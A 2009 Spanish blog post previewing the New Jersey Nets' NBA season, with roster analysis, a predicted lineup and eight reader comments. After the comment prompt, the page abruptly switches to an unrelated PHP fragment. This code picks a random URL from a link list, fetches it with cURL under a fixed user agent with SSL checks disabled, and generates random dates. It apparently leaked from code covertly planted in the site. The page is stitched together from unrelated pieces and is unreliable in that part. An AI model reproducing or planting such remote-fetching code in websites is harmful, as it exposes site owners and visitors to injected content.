New Jersey Nets: Waiting for the Sun

18 de October de 2009 por Queco

Hace dos años, cuando surgió la idea de hacer análisis individualizados de cada equipo, yo me encargué del de los Nets. Recuerdo haberlo titulado ¿”y por qué no?”, pues yo creía en aquel equipo, con ese trío exterior tan espectacular. La respuesta me la podría haber dado un chiquillo de preescolar: “Pues porque no”. De aquel equipo, ya no queda nada, al menos nada destacable: Jason Kidd y Richard Jefferson volaron el año pasado, y Vince Carter acaba de hacer lo propio este verano. El presente se convirtió en pasado en el momento en que se vio que así no se llegaría nunca a ser campeones, y hubo que intercambiarlo por futuro y espacio salarial.

Ahora lideran la franquicia Devin Harris,  que viene de hacer una gran temporada, nominación para el All-Star incluída, y Brook Lopez, que en su campaña rookie promedió 13 puntos, 8 rebotes y casi 2 tapones por noche, haciendo creer en él a los escépticos, y dejando claro que hay vida más allá del decepcionante Oden y de un Bynum que parece que será pero no termina de ser. Un base (más anotador que distribuidor), y un pívot. Así se forma un equipo. Parece que se ha aprendido de los errores del pasado cuando se fiaba todo al trío exterior.

Sólo falta buscarles buena compañía, porque en estos momentos lo que hay es más bien poquita cosa. El traspaso de Carter a Orlando trajo a Courtney Lee, que será titular, y mejorará sus números con respecto a su anterior temporada, aunque yo no le veo excesivo potencial. Y desde luego dudo mucho que pueda asumir los 23 puntos por noche que promedia Vince Carter en su carrera. Su reserva será Chris Douglas-Roberts, jugador al que muchos ven un enorme potencial, y otros tantos nada en absoluto. Lo cierto es que a mí sí me da la impresión de que tiene algo.

Para el alero bajo está el rookie Terrence Williams, y los veteranos Jarvis Hayes y Bobby Simmons. El primero no estoy seguro de que sea precisamente los que los Nets necesitaban, y los otros están bastante de vuelta, amén de su propensión a lesionarse. Supongo que terminará por jugar el rookie, por aquello de darle minutos y que la flauta pueda sonar.

De PFs aparecen Josh Boone, Sean Williams y Yi Jianlian. También anda por New Jersey Eduardo Najera, aunque no creo que pase de jugar algún que otro minuto aislado. Particularmente me inclinaría por Josh Boone, que ha demostrado ser una ayuda en el rebote, ya que Williams no parece acabar de explotar y Yi es demasiado lento para ser SF, y demasiado blando para PF. Sería una incréible sorpresa que este chico hiciese algo, me da que Lawrence Frank estaría tan contento como sorprendido. De hecho, visto lo que ha hecho hasta ahora, dudo que merezca más oportunidades.

Completa la rotación, en el puesto de base suplente, Rafer Alston, si bien se rumorea que quiere ser traspasado cuanto antes, por lo que no lo he tenido muy en cuenta para el análisis.

Claro que todo esto tiene un lado bueno, y es que el equipo está muy, muy por debajo del límite salarial, más aún si deciden dejar ir a gente como Boone o Sean Williams, así que podrá entrar con fuerza en la subasta en que seguro se convertirá el mercado de agentes libres este verano. El sueño es Lebron, como el de todos. La realidad es que a ver qué pueden pescar, también como todos. Devin Harris y Brook Lopez serán la base del equipo, contando a Courtney Lee para la intendencia (fontanería, albañilería, calefacción…. jeje), los esfuerzos se harán en la contratación de un 3 y un 4, bien sea en el draft (y la elección será alta, seguro), bien sea fichando un agente libre, o en ambos.

Y después de lo que acabo de contaros os preguntaréis a qué viene el título que he puesto. Lo cierto es que ha sido más casualidad que otra cosa, porque me ha dado por poner música mientras escribía esto, un buen random de todo lo que tengo, lo cual a veces da sorprendentes resultados y sobre todo enormes cambios de ritmo, que es lo que me ha pasado hoy, pasando de Kreator a The Doors, de Violent revolution (curioso, ahora veo que también sería un buen título), a  Waiting for the sun. Se encendió la bombillita, eso es justo lo que harán los Nets: esperar al sol en forma de potentado ruso… A que se vaya el duro invierno de frío y derrotas, con la esperanza de un verano resplandeciente de grandes fichajes y mejores elecciones en el draft. Waiting for you to… come along!

Quinteto inicial: Devin Harris, Courntney Lee, Terrence Williams, Josh Boone, Brook Lopez

Sexto hombre: Chris Douglas Roberts

Prónostico: Pick de lotería.

Comenta

8 comentarios a esta entrada

  1. Jabho dice:
    #1

    Sin duda les queda esperar, pero pintan bastante bien. Como dices empezar a construir con un base como Harris y un pivot como Lopez no es empezar de 0. Lo demás tienen que ir construyendolo. Creo y mucho en Lee. Creo que va a ser de las sorpresas de la temporada, pero aun sin que pase eso si que le veo carrera NBA.

    Mucha espera, pero mejor camino que otros (Memphis, Wolves por ejemplo)

      Citar

  2. sergio dice:
    #2

    Un analisis muy acertado. Creo que Courtney Lee y Douglas Roberts jugaran juntos… o eso es lo que nos ha hecho creer el entrenador en pretemporada. Brook Lopez me parece que tiene un potencial considerable y, lo que es mas importante, inteligencia dentro de la pista. Yo los veo al nivel del año pasado mas o menos. Vince Carter es mejor que lo que tienen ahora pero no lo veia muy comprometido con el proyecto. Cane de 2010 de cualquier modo

      Citar

  3. CAMPO2 dice:
    #3

    Este es mi equipo y creo que estan trabajando bastante bien, tengo el miedo de que llegue el verano y ninguna superestrella quiera ir a los Nets, lo que seria un buen palo para la direccion tecnica.

      Citar

  4. Óscar dice:
    #4

    Gran titular para los Nets… qué gran disco el Waiting for the sun, como los otros 6 de los Doors.
    Añito de transición como dice el tópico. Me da que el ruso cuando empiece a ver el casilleros de derrotas va a empezar a “moverse” tipo Abramovich en su primer año en el Chelsea… A ver si al menos no se carga lo potable del equipo para las temporadas que vienen. De lo que se rodeé o se deje aconsejar puede depender que se construya un buen proyecto a partir de 2010.
    De los equipos con pocas opciones de Playoff parecen de los más atractivos, con un Brook Lopez que debe confirmar todo lo bueno del año rookie y un Devin Harris que se querrá ir al 25/10 para ganarse el All-Star y lograr un súpercontrato para los años siguientes. Y de Coutney Lee se puede esperar de todo,sobre todo bueno… esperemos.
    GRANDE MONTES, sonrisa de JUGÓN !!!

      Citar

  5. Dantley2 dice:
    #5

    Waiting for the sun, pero in the meantime hay argumentos para sus seguidores para tener un año interesante. Hay un grupito de jugadores interesantes. Hasta Yi parece que se está tomando en serio la preseason.

    Estoy de acuerdo con Óscar, Harris irá a por el All Star, aunque vamos a ver porque esos números no están al alcance de muchos ni siquiera en “mode hacer números”

      Citar

  6. kantonyo dice:
    #6

    Tanto Devin Harris como Brook Lopez, son grandes promesas que ya el año pasado ofrecieron buenos números. Pero yo permito el honor de discrepar con la mayoría, y considero que no pueden ser base de ningún proyecto de futuro. No tienen capacidad de liderazgo o por el momento no han encontrado esa madurez propia de un jugador franquicia.

    Os habéis olvidado a mi parecer de uno de los mayores errores del verano, ya no solo por dejar escapar a Vince Carter por Rafer Alston, Battie o Courtney Lee, sino porque en el paquete dejaron marchar a un diamante en bruto domo Ryan Anderson, teniendo en cuenta sobre todo los PF que se ha quedado NJ.

    Empeoran año a año …

      Citar

  7. Kiki dice:
    #7

    De acuerdo con Kantonyo en Ryan Anderson, yo tampoco entiendo porqué lo han regalado, aunque la temporada pasada fue decepcionante para él, incluso cuando tuvo minutos con la lesión de Yi Jianlian… En Orlando va a tener poco que hacer en principio, pero nunca se sabe con SVG. La plantilla de NJN parece haberse quedado en poquita cosa… esperando la “panacea” de 2010…

      Citar

  8. CAMPO2 dice:
    #8

    espero que este año le den mas bola a Dougglas-Roberts vaya temporada se ha hecho el chaval se lo merece

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>